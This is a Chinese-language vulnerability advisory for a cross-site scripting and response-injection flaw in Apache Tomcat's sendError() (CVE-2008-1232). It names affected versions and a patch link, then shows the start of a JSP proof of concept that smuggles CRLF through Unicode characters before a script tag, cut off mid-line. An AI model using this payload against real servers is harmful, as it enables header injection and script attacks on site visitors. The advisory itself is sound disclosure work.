Apache Tomcat HttpServletResponse.sendError()跨站脚本漏洞

2008-08-04T00:00:00
ID SSV:3762
Type seebug
Reporter Root
Modified 2008-08-04T00:00:00

Description

BUGTRAQ ID: 30496 CVE(CAN) ID: CVE-2008-1232

Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。

Apache Tomcat不仅在错误页面中显示了HttpServletResponse.sendError()调用的消息参数,同时也在HTTP响应的reason-phrase中使用,这就可能在HTTP头中包含非法字符。特制的消息可能导致跨站脚本攻击,向HTTP响应中注入任意内容。

Apache Group Tomcat 6.0.x Apache Group Tomcat 5.5.x Apache Group Tomcat 4.1.x Apache Group


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz target=_blank>http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz</a>

                                        
                                            
                                                &lt;%@page contentType=&quot;text/html&quot;%&gt;
&lt;%
~  // some unicode characters, that result in CRLF being printed
~  final String CRLF = &quot;\u010D\u010A&quot;;

~  final String payload = CRLF + CRLF + &quot;&lt;script
type='text/javas